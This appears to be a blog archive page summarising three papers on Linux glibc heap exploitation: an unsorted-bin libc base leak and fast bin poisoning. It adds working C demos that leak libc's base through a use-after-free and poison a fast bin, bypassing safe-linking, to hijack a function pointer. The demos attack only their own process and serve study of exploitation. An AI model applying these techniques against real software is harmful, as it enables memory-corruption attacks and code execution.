Posts

Showing posts from September, 2019

Linux Heap Unsorted Bin LIBC Base Leak

In this paper, I introduce the reader to a method to disclose the libc base address in the presence of ASLR, given an information leak of a chunk sitting in the unsorted bin of the Linux heap allocator, ptmalloc. A freed chunk in the unsorted bin carries fd and bk pointers into main_arena, a structure in libc's writable data, so leaking either pointer and subtracting a build-specific offset yields the libc base. Linux Heap Unsorted Bin LIBC Base Leak.PDF
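The leak described above, as an added example that is not from the paper or its author: a chunk large enough to skip tcache and the fast bins is freed into the unsorted bin, a simulated use-after-free reads back the fd pointer that free() wrote into the chunk, and /proc/self/maps is parsed to confirm the pointer lands inside libc and to compute the load base. The request size, the guard allocation and the maps parser are constructed for this demo; it assumes a 64-bit Linux process using glibc's ptmalloc.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Request size chosen to be above the tcache limit (0x408-byte requests) and
 * far above the fastbin limit, so free() links the chunk into the unsorted
 * bin instead of a per-thread cache. Constant chosen for this demo. */
#define LEAK_REQUEST 0x500

/* Simulated use-after-free read. free() writes the chunk's fd pointer over
 * the first 8 bytes of its user data; for a lone unsorted chunk that is the
 * address of the unsorted-bin list head inside main_arena, which lives in
 * libc's writable data. The guard allocation stops the freed chunk from
 * being merged into the top chunk (it is deliberately never freed). */
uintptr_t leak_unsorted_fd(void)
{
    uint64_t *victim = malloc(LEAK_REQUEST);
    void *guard = malloc(0x20);
    if (!victim || !guard)
        return 0;
    memset(victim, 'A', 32);                 /* whatever the program stored there */
    free(victim);
    volatile uint64_t *dangling = victim;    /* volatile: keep the UAF read at -O2 */
    return (uintptr_t)dangling[0];
}

/* One /proc/self/maps line: "lo-hi perms offset dev inode path". Returns 1
 * only for file-backed mappings (anonymous ones have no path field). */
static int parse_maps_line(const char *line, unsigned long *lo, unsigned long *hi,
                           char *path, size_t pathlen)
{
    unsigned long off, inode;
    char perms[8], dev[16], p[256] = "";
    if (sscanf(line, "%lx-%lx %7s %lx %15s %lu %255s",
               lo, hi, perms, &off, dev, &inode, p) < 7)
        return 0;
    snprintf(path, pathlen, "%s", p);
    return 1;
}

/* Locate the file whose mapping contains `addr` and return its load base
 * (the lowest start address of any of that file's mappings). This is the
 * check an exploit developer runs locally to confirm the leak lands in libc
 * and to compute the leak-to-base offset that the real exploit hard-codes
 * (remotely there is no /proc/self/maps to consult). */
int libc_base_from_leak(uintptr_t addr, uintptr_t *base, char *path, size_t pathlen)
{
    FILE *f = fopen("/proc/self/maps", "r");
    if (!f)
        return 0;
    char line[512], p[256], hit[256] = "";
    unsigned long lo, hi, best = ~0UL;
    int found = 0;
    while (fgets(line, sizeof line, f)) {
        if (!parse_maps_line(line, &lo, &hi, p, sizeof p))
            continue;
        if (addr >= lo && addr < hi) {
            snprintf(hit, sizeof hit, "%s", p);
            found = 1;
            break;
        }
    }
    if (found) {
        rewind(f);
        while (fgets(line, sizeof line, f)) {
            if (parse_maps_line(line, &lo, &hi, p, sizeof p) &&
                strcmp(p, hit) == 0 && lo < best)
                best = lo;
        }
        *base = best;
        snprintf(path, pathlen, "%s", hit);
    }
    fclose(f);
    return found;
}

int main(void)
{
    uintptr_t leak = leak_unsorted_fd(), base = 0;
    char path[256];
    if (!leak || !libc_base_from_leak(leak, &base, path, sizeof path)) {
        puts("leak did not land in a file-backed mapping (not glibc?)");
        return 1;
    }
    printf("leaked fd   = 0x%lx\n", (unsigned long)leak);
    printf("mapped from = %s\n", path);
    printf("libc base   = 0x%lx\n", (unsigned long)base);
    printf("leak - base = 0x%lx (unsorted-bin head offset for this libc build)\n",
           (unsigned long)(leak - base));
    return 0;
}
```

The printed leak-to-base difference is the constant a real exploit against this libc build would hard-code (main_arena's offset plus the unsorted-bin head offset inside it); it changes between glibc builds, so it must be recomputed for the target's libc rather than copied from another machine.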

Linux Heap Fast Bin Poisoning part 2

In this paper, I introduce the reader to a heap metadata corruption against the current Linux heap allocator, ptmalloc. The attack is performed by corrupting, or poisoning, the fast bin so that malloc returns an attacker-chosen pointer. It relaxes the requirements of part 1, where the returned pointer was only near-arbitrary, so that malloc now returns a fully arbitrary pointer; in exchange, more heap grooming is required. Linux Heap Fast Bin Poisoning part 2.PDF

Linux Heap Fast Bin Poisoning part 1

In this paper, I introduce the reader to a heap metadata corruption against the current Linux heap allocator, ptmalloc. The attack is performed by corrupting, or poisoning, the fast bin so that malloc returns a near-arbitrary pointer: the target address must be preceded by eight bytes that pass ptmalloc's fast bin size check. This may allow control-flow hijacking if malloc returns a pointer to memory holding a function pointer and the attacker can then write to the buffer malloc returned. Linux Heap Fast Bin Poisoning part 1.PDF
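The fast bin poisoning of part 1 (and the size-field constraint that part 2 above sets out to relax), as an added example that is not from either paper or its author: nine chunks of one fast bin size are allocated, seven are freed to fill that size's tcache bin so the last two reach the fast bin, the head chunk's fd is overwritten to point at a fake chunk in .bss whose size field matches the bin, and two calloc calls (which bypass tcache) hand back first the real chunk and then the fake one, after which a write into the "fresh buffer" lands on a function pointer. The target object, the chunk sizes and all names are constructed for this demo; it assumes x86-64 glibc (2.26 or later for the tcache grooming) and detects at run time whether the libc encodes fd pointers with safe-linking (glibc 2.32 and later).

```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

/* A 0x60-byte request gets a 0x70-byte chunk, fastbin index 5 on x86-64.
 * The sizes, the target object and every name here are constructed for
 * this demo. */
#define REQ          0x60
#define CHUNK_SIZE   0x70
#define TCACHE_SLOTS 7      /* glibc's default per-bin tcache count */

/* Attacker-chosen target outside the heap (here in .bss). To be handed out
 * by the allocator it must look like a 0x70 fastbin chunk: the 8 bytes
 * before its user data must hold a size whose fastbin index matches the
 * poisoned bin (0x70..0x7f; the low bits are flag bits and ignored). That
 * is the "near" in "near-arbitrary". */
struct target_obj {
    uint64_t prev_size;      /* fake chunk header, not checked */
    uint64_t size_like;      /* must read as 0x70..0x7f */
    uint64_t fd_slot;        /* user data +0: the fake chunk's fd */
    void (*callback)(void);  /* user data +8: what we really want to overwrite */
    uint64_t tail[11];       /* calloc clears 0x68 bytes from fd_slot; keep that in bounds */
};
static _Alignas(16) struct target_obj g_target;   /* glibc >= 2.32 rejects misaligned fastbin chunks */

/* glibc >= 2.32 "safe-linking" stores fd as (&fd >> 12) ^ ptr instead of
 * the raw pointer. Detected at run time below from a link free() writes. */
static int g_safe_linking = -1;

static uint64_t mangle(uint64_t fd_addr, uint64_t ptr)
{
    return g_safe_linking ? ((fd_addr >> 12) ^ ptr) : ptr;
}

/* Groom, poison, and allocate. Returns the user pointer the second poisoned
 * allocation hands back, or NULL if the allocator did not behave like
 * glibc's ptmalloc. */
void *fastbin_poison(void)
{
    void *fill[TCACHE_SLOTS], *b, *a;
    for (int i = 0; i < TCACHE_SLOTS; i++)
        fill[i] = malloc(REQ);
    b = malloc(REQ);
    a = malloc(REQ);
    for (int i = 0; i < TCACHE_SLOTS; i++)
        free(fill[i]);   /* fills the 0x70 tcache bin so later frees reach the fastbin */
    free(b);             /* fastbin: b */
    free(a);             /* fastbin: a -> b, with a->fd written at a's user pointer */

    /* Step 1: learn the fd encoding from the genuine a->b link. */
    volatile uint64_t *a_fd = (volatile uint64_t *)a;      /* dangling pointer */
    uint64_t b_chunk = (uint64_t)(uintptr_t)b - 0x10;
    if (a_fd[0] == b_chunk)
        g_safe_linking = 0;
    else if (a_fd[0] == (((uint64_t)(uintptr_t)a >> 12) ^ b_chunk))
        g_safe_linking = 1;
    else
        return NULL;

    /* Step 2: the metadata corruption. In a real target this is the
     * overflow or use-after-free write; here it is a direct store. The
     * fake chunk's own fd is set to an encoded NULL so the bin terminates. */
    g_target.size_like = CHUNK_SIZE;
    g_target.fd_slot   = mangle((uint64_t)(uintptr_t)&g_target.fd_slot, 0);
    a_fd[0]            = mangle((uint64_t)(uintptr_t)a, (uint64_t)(uintptr_t)&g_target);

    /* Step 3: calloc bypasses tcache and pulls straight from the fastbin,
     * running the size check on each chunk it unlinks. The first call gets
     * a; the second gets the fake chunk and returns &g_target.fd_slot. */
    void *first  = calloc(1, REQ);
    void *second = calloc(1, REQ);
    (void)first;
    return second;
}

static int g_pwned;
static void attacker_fn(void) { g_pwned = 1; }

/* The payoff from part 1: the program writes into what it believes is a
 * fresh buffer, and the write lands on g_target.callback. Returns 1 on success. */
int hijack_callback(void)
{
    void *buf = fastbin_poison();
    if (buf != (void *)&g_target.fd_slot)
        return 0;
    ((void (**)(void))buf)[1] = attacker_fn;   /* "user data +8" */
    g_target.callback();                       /* the victim's normal indirect call */
    return g_pwned;
}

int main(void)
{
    int ok = hijack_callback();
    printf("safe-linking: %s\n", g_safe_linking == 1 ? "yes (glibc >= 2.32)" : "no");
    printf("callback hijacked: %s\n", ok ? "yes" : "no");
    return ok ? 0 : 1;
}
```

Two details matter in practice. The size check ("malloc(): memory corruption (fast)") is what limits part 1 to near-arbitrary targets: change size_like to, say, 0x80 and the second calloc aborts. And the safe-linking detection is why the poisoned fd is written through mangle(): on glibc 2.32 and later a raw pointer in the fd slot is decoded into garbage and the allocator aborts on the misaligned result, so an exploit needs a heap address (or a leaked encoded fd) to compute the XOR key.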